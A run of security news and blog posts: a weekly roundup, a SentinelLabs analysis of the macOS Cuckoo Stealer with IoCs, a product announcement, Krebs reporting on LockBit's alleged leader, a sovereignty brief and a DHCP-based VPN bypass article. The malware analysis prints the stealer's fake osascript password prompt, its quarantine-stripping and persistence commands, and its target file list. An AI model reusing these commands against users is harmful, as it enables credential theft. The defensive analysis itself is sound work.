The Good, the Bad and the Ugly in Cybersecurity – Week 19

The Good | Russian-Based APT28 & LockBit Developer Condemned and Charged by International Enforcement

International law enforcement agencies took a hard stance against GRU-linked threat actors this week with the official condemnation of APT28 (aka Strontium, Fancy Bear, Forest Blizzard) and identification and sanctioning of LockBit ransomware’s administrator and developer.

NATO and the EU, joined by the U.S. and U.K., formally condemned the Russian threat group known as APT 28 for a long-term cyber espionage campaign against various European countries. In particular, Germany and the Czech Republic highlighted an email-based attack last year on various government agencies as well as organizations across the military, air and space, and IT sectors in NATO member countries, NATO fast reaction corps, and Ukraine. APT 28 has also been known to target critical infrastructures in various other EU member states.

The 2023 attack leveraged CVE-2023-23397, a zero-day vulnerability in Microsoft Outlook, to steal credentials, perform lateral movement in victim networks, and exfiltrate sensitive emails from specific accounts. NATO called on the Russian state to “respect their international obligations and commitments to uphold international law and act within the framework for responsible state behavior in cyberspace.”

From the DoJ, the identity of the developer and administrator behind the notorious LockBit ransomware group has finally been unveiled. Russian national Dmitry Yuryevich Khoroshev (aka LockBitSupp and putinkrab) is also being sanctioned by various international enforcement agencies with the U.S. Department of State offering a reward up to $10 million for information leading to his arrest or conviction.

Khoroshev’s sanctioning follows the joint operation earlier this year disrupting LockBit ransomware infrastructure and operations. Before the seizure of its public-facing websites and servers, Khoroshev and his affiliates were instrumental in LockBit’s rise to one of the world’s most prolific ransomware variants and operations, worth billions of dollars in damages and loss.

Source: Reuters

The Bad | Novel Cuckoo Infostealer Exhibits Spyware Capabilities on macOS Devices

An emerging malware dubbed “Cuckoo” is targeting Apple macOS devices, designed with a dual-purpose of stealing information and acting as spyware. Cuckoo is a universal Mach-O binary capable of running on both Intel and Arm-based Macs. Observed distribution vectors show that the binary is hosted across a smattering of websites that claim to convert music from paid streaming devices to MP3 files for download.

Cuckoo is adept at exploiting osascript to prompt users for their system password and running commands to gather sensitive data like hardware information, currently running processes, and installed apps. It can also take screenshots and harvest from iCloud Keychain (Apple’s password management system), Apple Notes, web browsers, crypto wallets, and popular apps like Steam, Telegram, and Discord.

Infostealers targeting macOS usually do not work towards establishing persistence, but such behavior is crucial to spyware. Cuckoo sets persistence through a LaunchAgent that runs when the user logs in and every 60 seconds during login.

New analysis from SentinelLabs reports a rise in Cuckoo samples and trojanized apps, with new ones appearing daily since the original Cuckoo stealer was first reported late last month. These trojanized apps advertise dubious services and are able to trick users past warnings from Apple Gatekeeper. SentinelLabs also confirms that at the time of writing, the latest version of XProtect (version 2194) is unable to block execution of Cuckoo malware. SentinelOne customers are protected from macOS Cuckoo Stealer.

As a best practice, users should always proceed with caution when downloading apps from unknown, third-party developers. With the rise in malware targeting macOS devices over the last few years, it is essential now to ensure that Macs are fully protected with an advanced security solution just like other operating systems.

The Ugly | Two New F5 Flaws Leave BIG-IP Next Central Manager Open to Remote Exploits & Device Takeover

Multi-cloud and application security vendor, F5, has released fixes for two high-severity vulnerabilities found in BIG-IP Next Central Manager, the main component in controlling BIG-IP Next load balancers and app instances in both on-prem and cloud environments. Both CVE-2024-26026 (an SQL injection flaw) and CVE-2024-21793 (an OData injection flaw) could allow execution of malicious SQL commands on unpatched devices through the BIG-IP Next Central Manager API.

In an SQL injection attack, attackers inject the malicious queries into input fields or parameters to manipulate the database to execute unauthorized commands. This can lead to unauthorized access, data leakage, and even complete control over the database. These attacks are often leveraged to extract sensitive information or tamper with data within the database, posing significant risks to the security and integrity of the targeted web applications.

Security researchers have noted how the vulnerabilities would first be exploited to obtain full administrative control of the Next Central Manager before creating rogue administrative accounts hidden from the Manager user interface (UI). These “invisible” accounts would then allow attackers to establish persistence in the environment, even if the legitimate admin account password was reset in the UI and the system patched. F5 has recommended its users to patch immediately, or to restrict Next Central Manager access to trusted users only over a secure network until the updates can be installed.

Source: Eclypsium

In the past two years, several critical-level F5 flaws have made headlines. One flaw from October 2023 in the BIG-IP configuration utility allowed remote code execution and another from May 2022 targeted networks across government agencies and private sector organizations, prompting CISA to issue a warning to all Federal Civilian Executive Branch Agencies (FCEB) affected.

macOS Cuckoo Stealer | Ensuring Detection and Defense as New Samples Rapidly Emerge

Infostealers targeting macOS devices have been on the rise for well over a year now, with variants such as Atomic Stealer (Amos), RealStealer (Realst), MetaStealer and others widely distributed in the wild through malicious websites, cracked applications and trojan installers. These past few weeks have seen a new macOS malware family appear that researchers have dubbed ‘Cuckoo Stealer’, drawing attention to its abilities to act both as an infostealer and as spyware.

In this post, we review Cuckoo Stealer’s main features and logic from a detection point of view and offer extended indicators of compromise to aid threat hunters and defenders. At the time of writing the latest version of XProtect, version 2194, does not block execution of Cuckoo Stealer malware. SentinelOne customers are protected from macOS Cuckoo Stealer.

More Cuckoo Stealers Appearing

Since the initial report on the emergence of this family of malware on April 30, we have seen a rise in new samples and trojanized applications from the initial four originally reported by Kandji to 18 unique trojanized applications at the time of writing, with new samples appearing daily.

The trojanized apps are various kinds of “potentially unwanted programs” offering dubious services such as PDF or music converters, cleaners and uninstallers (a full list appears in the IoCs at the end of this post) such as:

  • App Uninstaller.app
  • DumpMedia Amazon Music Converter.app
  • FoneDog Toolkit for Android on Mac.app
  • iMyMac PDF Compressor.app
  • PowerUninstall.app
  • TuneSolo Apple Music Converter.app

As reported previously, these applications contain a malicious binary in the MacOS folder named upd. The most recent binaries – in ‘fat’ and ‘thin’ versions for both Intel x86 and arm64 architectures – are ad hoc codesigned and their parent applications all share the same bundle identifier, upd.upd.

Apple’s codesign utility will provide identical output for all these samples:

codesign -dv file
…
Identifier=upd.upd
Format=Mach-O thin (x86_64)
CodeDirectory v=20400 size=1536 flags=0x2(adhoc) hashes=38+7 location=embedded
Signature=adhoc
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
Internal requirements count=0 size=12

Some protection is offered to unsuspecting users by Apple’s Gatekeeper, which will by default throw a warning that the application is not notarized. The malware authors have anticipated this and provided the user with instructions on how to run the application.

macOS Cuckoo Stealer Gatekeeper

The malware is written in C++ and was created in build 12B45b of Xcode, version 12.2, a rather old version that was released in November 2020, using a device still running macOS 11 Big Sur (build 20A2408) from the same year.

The code signature and the application’s Info.plist containing this information make current samples relatively easy to identify.

Simple Obfuscation Helps Cuckoo to Hide in Apple’s Nest

A noticeable characteristic of the malware is the heavy use of XOR’d strings in an attempt to hide its behavior from simple static signature scanners. The samples use different XOR keys (see the list of IoCs at the end of this post) of varying lengths to decrypt the main strings and functionality dynamically.

Though the binary is stripped and lacks function names, the decrypt routine is readily identifiable from the large number of cross references to it in the rest of the code. Current samples call the decrypt routine precisely 223 times.

Cuckoo decryption function
Cuckoo decryption function

By breaking on this function in a debugger, it is relatively straightforward to output the decrypted strings to understand the malware’s behavior.

However, not all obfuscated strings are processed through this function. The decryption key and routine can be found independently in other places in the code as well.

Of the few unobfuscated strings in the current binary is one that represents an array of file extensions, indicating the kind of information the malware authors are interested in stealing.

{"txt", "rtf", "doc", "docx", "xls", "xlsx", "key", "wallet", "jpg", "dat", "pdf", "pem", "asc", "ppk", "rdp", "sql", "ovpn", "kdbx", "conf", "json"}

Looking for cross references to ‘wallet’ (one of the items in the array), we find the array is consumed in a function which calls both the decrypt function and another function that implements the same XOR routine and key.

macOS Cuckoo in function decryption

In radare2, we can find all references to the XOR key via grepping the output of the ax command for the string’s address.

Finding cross references in radare2
Finding cross references in radare2

Cuckoo Stealer Observable Behavior

Despite these attempts at obfuscation, analysis of Cuckoo Stealer reveals that, unsurprisingly, it uses many of the same techniques as other infostealers we have encountered in the last 12 months or so. In particular, it makes various uses of AppleScript to duplicate files and folders of interest and to steal the user’s admin password in plain text.

SentinelOne detects Cuckoo stealer
SentinelOne detects Cuckoo Stealer

This is achieved through a simple AppleScript dialog using the “hidden answer” option, a ploy that macOS attackers have been using since at least 2008, as we observed recently in relation to Atomic Stealer.

With Cuckoo Stealer, if the user enters anything other than a valid admin password, the malware will repeatedly display the dialog until the right password is provided. This remains true even if the user presses the ‘Cancel’ button.

The underlying mechanism for how the password is checked was nicely elucidated by Kandji researchers here. The scraped password is then saved in clear text in a file named pw.dat in a hidden subfolder of the User’s home directory. The hidden folder’s name is a combination of .local- and a randomly generated UUID identifier. For example:

~/.local-6635DD81-94DD-59E3-9D84-20BD41C51999/

The following regexes can be used to find paths or commands containing this pattern:

.local-[[:xdigit:]]{8}-[[:xdigit:]]{4}-[[:xdigit:]]{4}-[[:xdigit:]]{4}-[[:xdigit:]]{12}/

// alternatively:
.local-[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/

In addition, the malware also attempts to install a persistence LaunchAgent with the label com.user.loginscript. The name of the property list file itself will take the form of the parent application bundle. For example, the trojan DumpMedia Spotify Music Converter.app will create a plist called ~/Library/LaunchAgents/com.dumpmedia.spotifymusicconverter.plist, while iMyMac Video Converter.app will write the same plist out as com.immyac.videoconverter.plist.

Cuckoo Stealer Launch Agent
Cuckoo Stealer LaunchAgent

This persistence agent will point to a copy of the upd binary located in the same hidden .local- directory mentioned above.

The malware also makes use of several Living Off the Land utilities including xattr, osascript and system_profiler for discovery.

Command Arguments
awk /Hardware UUID/{print $(NF)}
launchctl load -w “/Users/user1/Library/LaunchAgents/com.dumpmedia.spotifymusicconverter.plist”
osascript -e ‘display dialog “macOS needs to access System Settings” default answer “” with title “System Preferences” with icon caution with hidden answer’
system_profiler SPHardwareDataType | awk ‘/Hardware UUID/{print $(NF)}’
xattr -d com.apple.quarantine “/Users/user1/.local-6635DD81-94DD-59E3-9D84-20BD41C51999/DumpMediaSpotifyMusicConverter”
SentinelOne detects Cuckoo Stealer
Cuckoo Stealer execution chain

SentinelOne Protects Against Cuckoo Stealer

SentinelOne Singularity detects Cuckoo Stealer and prevents its execution when the policy is set to Protect/Protect. In Detect mode, the agent will allow analysts to observe and investigate malicious behavior, as shown below.

SentinelOne Console detects Cuckoo Stealer

Agent version 23.4.1.7125 and later offer an extensive set of behavioral indicators including reference to MITRE TTPs specific to macOS infostealers.

Conclusion

The actors behind the Cuckoo Stealer campaign have clearly invested some resources into developing a novel infostealer rather than buying any of the ready-made offerings currently circulating in various Telegram channels and darknet forums. This, along with the rising numbers of samples we have observed since initial reporting of this threat, suggests that we will likely see further variants of this malware in the future.

Enterprises are advised to use a third party security solution such as SentinelOne Singularity to ensure that devices are protected against this and other threats targeting macOS devices in the fleet.

To learn more about how SentinelOne can help protect your organization, contact us or request a free demo.

Indicators of Compromise

Bundle Identifier
upd.upd

Observed Application Names
App Uninstaller.app
DumpMedia Amazon Music Converter.app
DumpMedia DeezPlus.app
DumpMedia Pandora Music Converter.app
DumpMedia Spotify Music Converter.app
DumpMedia Video Converter.app
DumpMedia YouTube Music Converter.app
FoneDog Data Recovery.app
FoneDog iPhone Cleaner.app
FoneDog PDF Compressor.app
FoneDog Toolkit for Android on Mac.app
FoneDog Toolkit for iOS on Mac.app
FoneDog Video Converter.app
iMyMac PDF Compressor.app
iMyMac Video Converter.app
PowerUninstall.app
TunesFun Apple Music Converter.app
TuneSolo Apple Music Converter.app

Observed Mach-Os (SHA1)
04a572b2a17412bba6c875a43289aac521f7b98d
0e3e58a2b19072823df2ec52f09e51acf0d0d724
127c486eab9398a2f42208d96aa12dd8fcfb68b5
1ef1f94d39931b6e625167b021a718f3cfe6bb80
1f49bb334ebcec6b2493d157caf90a8146fb68d9
219f57e9afe201ad4088340cd5b191223d4c4227
24c311abe5d93d21172a6928ba3a211528aa04f9
266f48c38efbb5a6d49fb74194c74fe68d02d62a
298c9ab225d7262a2106bc7bec0993eaa1210a0d
2a422057790bae755c3225aff3e47977df234b11
2c7ec5358b69f8e36c35c53501e4ba6efce25689
2cdda89c50c2aa1eb4b828350b7086748c58fe08
35d75565de813e89a765718ed31c1bfebfd3c11c
4cf895c391557498d2586cee3ace3c32a3a83a4e
4cfdf872051900df8a959b95a03f6c906ad4596e
50360b325aad398a5d580a2adc9aef597eb98855
5220a53c1930ea93849caa88850cb6628a06cd90
57a1f3d3cbbc33b92177660ee620bff4f1c5b229
63eb1abe69b11c8ae04092ccf822633d1e1ff648
69c6c1f09f8a1ad61f1c48527ff27e56847a716f
6aba0ebabccea1902ba2ab7ac183a4bd22617555
71fddbccb15904b14b5773e689f611bfd5a0d111
82c70c956f5f66cf642991285fd631a9094abbf4
873fd2fc21457e707832c859534d596a7c803a46
8bab36fe676c8296ef3889d5ef0afcc4b3f017f3
8bc02ae4262eaf2cbb2454709db7f95cebcc9432
8bee44d0e4e22d3a85cfb9d00d00cb7d85433c9d
8c10459be56dde03c75cda993a489373a8251abf
9ac058d4541aa0e7ba222d25c55c407451f318a7
9d4b45104b3eb3734cb0ba45ca365b95a4c88505
9efa91a0cba44334b1071344314853699155814f
ac755f6da9877a4fc161d666f866a1d82e6de1b0
ac948abaa90b4f1498e699706407ac0c6d4164c7
b49a69fa41a2d7f5f81dbc2be9ea7cfc45c1f3df
b4bd11aa174d1a2f75aff276a2f9c50c4b6a4a1d
b4da5459ccd0556357f8ccd3471a63eebfa6e3b7
b65880c2aecc15db8afa80f027ed0650be23e8f9
bd5cdf05db06c3a81b0509e9f85c26feb34cea81
c5c8335ed343d14d2150a9ba90e182ca739bde8a
c8a6e4a3b16adf5be7c37b589d36cb2bd9706a92
c98d92e01423800404c77f6f82d62e5e7516d46d
cd04a6df24ab7852267619d388dee17f20c66deb
cf069bcafb6510282c8aeab7282e19abc46d558f
db180e1664e566a3393d884a52b93b35bb33911e
db19034d60973d0bcaa237c24252fe969803bc7c
dfed0ca9d883a45a40b2c23c29557ac4679ef698
e57b537f5f3307c6c59f5477e6320f17a9ba5046
e68f0f0e6102a1cd78d5d32ec7807b2060d08f79
e6fa7fcbaf339df464279b8090f6908fed7b325a
e9180ee202c42e2b94689c7e3fb2532dd5179fad
ecca309e0b43cd7f4517a863b95abf7b89be4584
f4999331606b753daaf6d6ad84917712f1420c85
f6e9081e36ca28bf619aebb40a67c56a2de2806e
fad49cac81011214d7fe3db7fc0bd663ef7bb353

Observed XOR Keys
0dhIscuDmR6xn3VMAG9ZYjBKC4VDeXGbyDyWjHM
4E72G6aXPne5ejcUgAfae6khJB3c871V0QUmkI
6neCM1yILp7V3BbMpgfgYYE6KY
7ricF8bWO0eBNiKEravcj2iIXohSNt
7Y9lGDAyEf9vxEmFgRqpDwYM52NFPbsUc
GXMSjRLvCPrrFnc1xa3xvYd43DfM8
HhvDDxmmfm7QuLH4rP63Fzn2eyW5BzuM3N
Hnyl2YPkOMLTNOndVtQwON
JB3k62Vtqymx09aJtnF9lZrCeIc
JsGqCdROAT1VDpSnxrAyZY45uQvRFP
LydNPzURb22Lxk4fxPkdd
MTGpOAycVm9btlQyEa5xVQPiz
Qmi5gstd6Oc27AJLXJQtEqGMxXzHUx
QssogTgvuTaZzPYZQynw0d
aZeTZw0X2lXM083cgmJQvnmCn9kmt
coOwAdmPtzt5Ps9rvUGOMEeFYajX2nJaismV
rzdbcSkVHXHefChUJQFGjAm12oinXwlyH2sHfiY
vLiOnPSKZ1bqjlp1dwuDvmmeQ3QN

SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.

Think Like an Attacker with SentinelOne’s Cloud Native Security (CNS)

SentinelOne is very excited to announce the general availability (GA) of Singularity Cloud Native Security!

Cloud Native Security (CNS), our agentless Cloud Native Application Protection Platform (CNAPP) based on our recent PingSafe acquisition, is now integrated into the Singularity Platform and available to new and existing customers via our unified security console, the Singularity Operations Center. If you’re a new customer, we’d love to show you how CNS improves cloud security.

This announcement reinforces our continuous commitment to deliver security innovation to our customers. General availability of CNS comes within the first 100 days post-acquisition (we’re at Day 94!) and we are pleased to say that SentinelOne customers can now access these critical capabilities to help them radically reduce their cloud attack surface and improve their cloud security posture.

“SentinelOne CNS has been a value add for Observe.AI from day one. Its offensive security engine is one of a kind and a big differentiator. As soon as we onboarded SentinelOne CNS for proof of value, it not only reduced the noise that was evident with other scanners, but it also helped prioritize security issues, saving countless hours for developers and security engineers.

Its offensive security approach can be an eye-opener for infrastructure teams, providing deeper insights into the external cloud attack surface. I highly recommend SentinelOne CNS for securing cloud resources.” Krutin Karia, Head of Security, Observe.AI

Prioritizing Cloud Health Through Evidence-Based Security

With rapid agentless onboarding across 6 different cloud environments, Cloud Native Security consolidates and correlates a range of cloud security capabilities:

  • Rapid onboarding with multi-cloud support
  • Cloud Asset Inventory and mapping with easy-to-understand graph visualizations
  • Vulnerability Scanning
  • Cloud Security Posture Management (CSPM)
  • Secrets Scanning
  • Infrastructure as Code (IaC) Scanning, including VCS integration
  • Container Image Security, including CI/CD integration
  • Software Bill of Materials (SBOM)
  • Kubernetes Security Posture Management (KSPM)
  • Cloud Detection and Response (CDR)
  • Integration with Singularity Data Lake for accelerated investigations via Purple AI

Cloud Native Security leverages a unique attacker’s mindset to identify and verify risks that require immediate attention and action.

Cloud Native Security is powered by the Offensive Security Engine™, which delivers crucial value and an industry-first for customers: Verified Exploit Paths™. Where cloud alerts typically consist of overwhelming noise, are time-intensive to validate, and prone to false positives, the Offensive Security Engine differentiates between theoretical and exploitable risks by providing proof of exploitability with each alert.

 

This evidence-based approach to prioritization and alert validation surfaces remediation opportunities for security practitioners to immediately and concretely increase their cloud security posture. This is another key innovation from SentinelOne that empowers security practitioners by minimizing dependence on human vetting.

By combining the agentless Cloud Native Security alongside our hyper-performant, user-mode agent-based Cloud Workload Security and Cloud Data Security, customers can enjoy visibility and security controls from code to cloud, with powerful capabilities to prevent, detect, and respond across the cloud lifecycle.

Learn More

This is SentinelOne’s comprehensive CNAPP vision – agentless and agent-based cloud security combined to provide the world’s most powerful AI-powered cloud threat protection. Learn more about SentinelOne’s Cloud Security portfolio here or book a demo with our expert team today.

Singularity™ Cloud Security
Improve prioritization, respond faster, and surface actionable insights with Singularity™ Cloud Security, the comprehensive, AI-powered CNAPP from SentinelOne.

U.S. Charges Russian Man as Boss of LockBit Ransomware Group

The United States joined the United Kingdom and Australia today in sanctioning 31-year-old Russian national Dmitry Yuryevich Khoroshev as the alleged leader of the infamous ransomware group LockBit. The U.S. Department of Justice also indicted Khoroshev and charged him with using Lockbit to attack more than 2,000 victims and extort at least $100 million in ransomware payments.

Image: U.K. National Crime Agency.

Khoroshev (Дмитрий Юрьевич Хорошев), a resident of Voronezh, Russia, was charged in a 26-count indictment by a grand jury in New Jersey.

“Dmitry Khoroshev conceived, developed, and administered Lockbit, the most prolific ransomware variant and group in the world, enabling himself and his affiliates to wreak havoc and cause billions of dollars in damage to thousands of victims around the globe,” U.S. Attorney Philip R. Sellinger said in a statement released by the Justice Department.

The indictment alleges Khoroshev acted as the LockBit ransomware group’s developer and administrator from its inception in September 2019 through May 2024, and that he typically received a 20 percent share of each ransom payment extorted from LockBit victims.

The government says LockBit victims included individuals, small businesses, multinational corporations, hospitals, schools, nonprofit organizations, critical infrastructure, and government and law-enforcement agencies.

“Khoroshev and his co-conspirators extracted at least $500 million in ransom payments from their victims and caused billions of dollars in broader losses, such as lost revenue, incident response, and recovery,” the DOJ said. “The LockBit ransomware group attacked more than 2,500 victims in at least 120 countries, including 1,800 victims in the United States.”

The unmasking of LockBitSupp comes nearly three months after U.S. and U.K. authorities seized the darknet websites run by LockBit, retrofitting it with press releases about the law enforcement action and free tools to help LockBit victims decrypt infected systems.

The feds used the existing design on LockBit’s victim shaming website to feature press releases and free decryption tools.

One of the blog captions that authorities left on the seized site was a teaser page that read, “Who is LockbitSupp?,” which promised to reveal the true identity of the ransomware group leader. That item featured a countdown clock until the big reveal, but when the site’s timer expired no such details were offered.

Following the FBI’s raid, LockBitSupp took to Russian cybercrime forums to assure his partners and affiliates that the ransomware operation was still fully operational. LockBitSupp also raised another set of darknet websites that soon promised to release data stolen from a number of LockBit victims ransomed prior to the FBI raid.

One of the victims LockBitSupp continued extorting was Fulton County, Ga. Eve LockBit’s darknet sites. Following the FBI raid, LockbitSupp vowed to release sensitive documents stolen from the county court system unless paid a ransom demand before LockBit’s countdown timer expired. But when Fulton County officials refused to pay and the timer expired, no stolen records were ever published. Experts said it was likely the FBI had in fact seized all of LockBit’s stolen data.

LockBitSupp also bragged that their real identity would never be revealed, and at one point offered to pay $10 million to anyone who could discover their real name.

KrebsOnSecurity has been in intermittent contact with LockBitSupp for several months over the course of reporting on different LockBit victims. Reached at the same ToX instant messenger identity that the ransomware group leader has promoted on Russian cybercrime forums, LockBitSupp claimed the authorities named the wrong guy.

“It’s not me,” LockBitSupp replied in Russian. “I don’t understand how the FBI was able to connect me with this poor guy. Where is the logical chain that it is me? Don’t you feel sorry for a random innocent person?”

LockBitSupp, who now has a $10 million bounty on his head from the U.S. Department of State, has been known to be flexible with the truth. The Lockbit group routinely practiced “double extortion” against its victims — requiring one ransom payment for a key to unlock hijacked systems, and a separate payment in exchange for a promise to delete data stolen from its victims.

But Justice Department officials say LockBit never deleted its victims data, regardless of whether those organizations paid a ransom to keep the information from being published on LockBit’s victim shaming website.

Khoroshev is the sixth person officially indicted as active members of LockBit. The government says Russian national Artur Sungatov used LockBit ransomware against victims in manufacturing, logistics, insurance and other companies throughout the United States.

Ivan Gennadievich Kondratyev, a.k.a. “Bassterlord,” allegedly deployed LockBit against targets in the United States, Singapore, Taiwan, and Lebanon. Kondratyev is also charged (PDF) with three criminal counts arising from his alleged use of the Sodinokibi (aka “REvil“) ransomware variant to encrypt data, exfiltrate victim information, and extort a ransom payment from a corporate victim based in Alameda County, California.

In May 2023, U.S. authorities unsealed indictments against two alleged LockBit affiliates, Mikhail “Wazawaka” Matveev and Mikhail Vasiliev. In January 2022, KrebsOnSecurity published Who is the Network Access Broker ‘Wazawaka,’ which followed clues from Wazawaka’s many pseudonyms and contact details on the Russian-language cybercrime forums back to a 31-year-old Mikhail Matveev from Abaza, RU.

Matveev remains at large, presumably still in Russia. Meanwhile, the U.S. Department of State has a standing $10 million reward offer for information leading to Matveev’s arrest.

Vasiliev, 35, of Bradford, Ontario, Canada, is in custody in Canada awaiting extradition to the United States (the complaint against Vasiliev is at this PDF).

In June 2023, Russian national Ruslan Magomedovich Astamirov was charged in New Jersey for his participation in the LockBit conspiracy, including the deployment of LockBit against victims in Florida, Japan, France, and Kenya. Astamirov is currently in custody in the United States awaiting trial.

The Justice Department is urging victims targeted by LockBit to contact the FBI at https://lockbitvictims.ic3.gov/ to file an official complaint, and to determine whether affected systems can be successfully decrypted.

PinnacleOne ExecBrief | Digital Sovereignty and Splinternets in Cloud, AI & Space

Last week, PinnacleOne reviewed the collision of commercial interests and state competition in space.

This week, we step back and examine the growing trend towards digital sovereignty, manifesting in national competition to secure and lead increasingly strategic cloud, AI, and space networks.

Please subscribe to read future issues — and forward this newsletter to interested colleagues.

Contact us directly with any comments or questions: pinnacleone-info@sentinelone.com

Insight Focus | Digital Sovereignty and Splinternets in Cloud, AI, and Space

The concept of digital sovereignty has gained significant traction in recent years as nations seek to assert greater control over critical economic and military capabilities at the technical frontier. This trend – driven by geopolitical competition and the strategic importance of data, cloud computing, artificial intelligence (AI), and space technologies – has significant implications for global businesses. As nations pursue sovereign capabilities across these domains, corporate leaders must navigate an increasingly complex and fragmented digital and security landscape.

Data/Cloud Sovereignty

Nations are establishing sovereign cloud services to maintain control over their data and ensure compliance with local regulations and privacy requirements. The partnership between Microsoft and G42 in the United Arab Emirates exemplifies this trend, offering secure access to cloud and AI features while adhering to local data sovereignty requirements. Microsoft is also expanding its Azure services footprint in the UAE via Khazna Data Centers, a joint venture between G42 and e& to support this initiative.

In the words of Secretary Raimondo, “When it comes to emerging technology, you cannot be both in China’s camp and our camp.” It remains to be seen which side will end up benefiting more from this deal, given how much the U.S. had to offer to (apparently) woo G42 from its Chinese entanglements. Nevertheless, the forces of geopolitical network competition are clearly multipolar – this gives middle powers juice to make deals with multinational cloud providers on favorable terms, including respect for data sovereignty and localization of frontier capabilities.

AI Sovereignty

The strategic importance of AI is leading more nations to pursue AI sovereignty, recognizing the need to develop and (attempt to) control this transformative technology. Industry leaders like Jensen Huang of Nvidia and Arvind Krishna of IBM have advocated for countries to build their own “sovereign AI” capabilities, tailored to their specific language, cultural, and business needs.

Leading and guiding AI technologies is seen as critical for defending national interests and ensuring economic and military security. Examples of sovereign AI strategies include India’s plan to organize and make available Indian data for AI model creation, Singapore’s Southeast Asia AI plan, the Netherlands’ generative AI vision, and Taiwan’s sovereign model strategy to counter the influence of Chinese AI tools. As a sign of the times, some tech investors are eyeing the idea of “sovereign computational stacks” which float aboard undersea-cable connected platforms that help sanctioned entities skirt regulators.

Space Sovereignty

Nations are also seeking to establish their own satellite constellations for secure, reliable, and high-bandwidth communications, commercial space-based observation, scientific, and defense purposes. The United States’ Proliferated Warfighter Space Architecture (PWSA), a secure low-Earth orbit (LEO) network, and China’s plans for a LEO broadband constellation highlight the growing importance of space sovereignty in the LEO domain, currently dominated by SpaceX. The European Union has also approved plans for the IRIS 2 constellation, a multi-orbit satellite system designed to bolster Europe’s governmental and institutional communication services and digital sovereignty.

The Emirates has formed their own national space champion, Space42, by merging their AI-driven geospatial intelligence provider Bayanat with Yahsat, the UAE’s principal satellite firm. The link between space and AI is explicit per the Space42 chairman, “Building upon its enormous capabilities, the new entity is poised to play a significant role in realizing the ambitious objectives outlined by the National Space Strategy 2030 and the National Strategy for Artificial Intelligence 2031”.

As we examined last week, these developments have significant implications for the blurred lines between commercial interests and national imperatives as the space domain becomes increasingly contested and potentially a field of conflict.

Compliance and Cybersecurity Challenges

As nations assert digital sovereignty, companies operating globally will face a complex web of data governance, privacy, and operational regulations across multiple jurisdictions. Compliance with diverse requirements for data localization, storage, processing, and access will be a significant challenge. Moreover, the fragmentation of digital infrastructure and the proliferation of sovereign systems may introduce new cybersecurity risks, as companies must ensure the security and integrity of their data and systems across multiple platforms and jurisdictions.

Market Access and Data Flow Implications

The rise of sovereign cloud services, AI capabilities, and space and terrestrial communication networks may restrict the free flow of data across borders and limit market access for foreign companies. Nations may prioritize domestic providers or impose barriers to entry for foreign firms, particularly in strategic sectors. For example, China’s LEO broadband constellation could hinder outside attempts to garner market share within the country or its allies. Executives must anticipate potential disruptions to their global operations and supply chains while exploring partnerships or localization strategies to maintain access to key markets.

Navigating the Fragmented Digital Landscape

The proliferation of sovereign digital infrastructures could lead to a fragmented global digital landscape, often referred to as the “splinternet”. This fragmentation may hinder interoperability, collaboration, and innovation across borders, impacting the ability of multinational companies to leverage digital technologies effectively. Leaders must consider the long-term implications of a splintered digital ecosystem and develop strategies to navigate this increasingly complex environment while ensuring the security and resilience of their digital assets.

Strategic Considerations for Corporate Leaders

  1. Assess compliance and cybersecurity requirements – Evaluate the impact of digital sovereignty regulations in each market and ensure compliance with data governance, privacy, and operational requirements while addressing the cybersecurity challenges posed by fragmented digital infrastructures.
  2. Mitigate market access risks – Anticipate potential disruptions to global operations and supply chains due to restricted data flows and market access barriers. Consider partnerships or localization strategies to maintain a presence in key markets.
  3. Adapt to a fragmented digital landscape – Develop strategies to navigate the complexities of a splintered digital ecosystem, addressing interoperability challenges, potential barriers to collaboration and innovation, and the cybersecurity implications of operating across multiple sovereign platforms.
  4. Invest in resilient and secure digital infrastructure – Build resilient and adaptable digital infrastructure that can withstand the challenges posed by digital sovereignty trends and ensure the security and integrity of data and systems across multiple jurisdictions.
  5. Engage in policy dialogues – Actively participate in policy discussions and industry forums to advocate for balanced approaches that safeguard national interests, promote global collaboration and innovation, and address the cybersecurity challenges posed by digital sovereignty.

Going Forward

The pursuit of digital sovereignty by nations has significant implications for the global digital landscape, potentially leading to a fragmented “splinternet” and introducing new cybersecurity and enterprise architecture challenges. Corporate leaders must navigate an increasingly complex web of compliance requirements, market access barriers, interoperability issues, and cybersecurity risks.

By proactively assessing the impact of digital sovereignty trends, adapting strategies accordingly, investing in secure and resilient digital infrastructure, and engaging in policy dialogues, executives can position their organizations to thrive in an increasingly complex and fragmented digital world.

Why Your VPN May Not Be As Secure As It Claims

Virtual private networking (VPN) companies market their services as a way to prevent anyone from snooping on your Internet usage. But new research suggests this is a dangerous assumption when connecting to a VPN via an untrusted network, because attackers on the same network could force a target’s traffic off of the protection provided by their VPN without triggering any alerts to the user.

Image: Shutterstock.

When a device initially tries to connect to a network, it broadcasts a message to the entire local network stating that it is requesting an Internet address. Normally, the only system on the network that notices this request and replies is the router responsible for managing the network to which the user is trying to connect.

The machine on a network responsible for fielding these requests is called a Dynamic Host Configuration Protocol (DHCP) server, which will issue time-based leases for IP addresses. The DHCP server also takes care of setting a specific local address — known as an Internet gateway — that all connecting systems will use as a primary route to the Web.

VPNs work by creating a virtual network interface that serves as an encrypted tunnel for communications. But researchers at Leviathan Security say they’ve discovered it’s possible to abuse an obscure feature built into the DHCP standard so that other users on the local network are forced to connect to a rogue DHCP server.

“Our technique is to run a DHCP server on the same network as a targeted VPN user and to also set our DHCP configuration to use itself as a gateway,” Leviathan researchers Lizzie Moratti and Dani Cronce wrote. “When the traffic hits our gateway, we use traffic forwarding rules on the DHCP server to pass traffic through to a legitimate gateway while we snoop on it.”

The feature being abused here is known as DHCP option 121, and it allows a DHCP server to set a route on the VPN user’s system that is more specific than those used by most VPNs. Abusing this option, Leviathan found, effectively gives an attacker on the local network the ability to set up routing rules that have a higher priority than the routes for the virtual network interface that the target’s VPN creates.

“Pushing a route also means that the network traffic will be sent over the same interface as the DHCP server instead of the virtual network interface,” the Leviathan researchers said. “This is intended functionality that isn’t clearly stated in the RFC [standard]. Therefore, for the routes we push, it is never encrypted by the VPN’s virtual interface but instead transmitted by the network interface that is talking to the DHCP server. As an attacker, we can select which IP addresses go over the tunnel and which addresses go over the network interface talking to our DHCP server.”

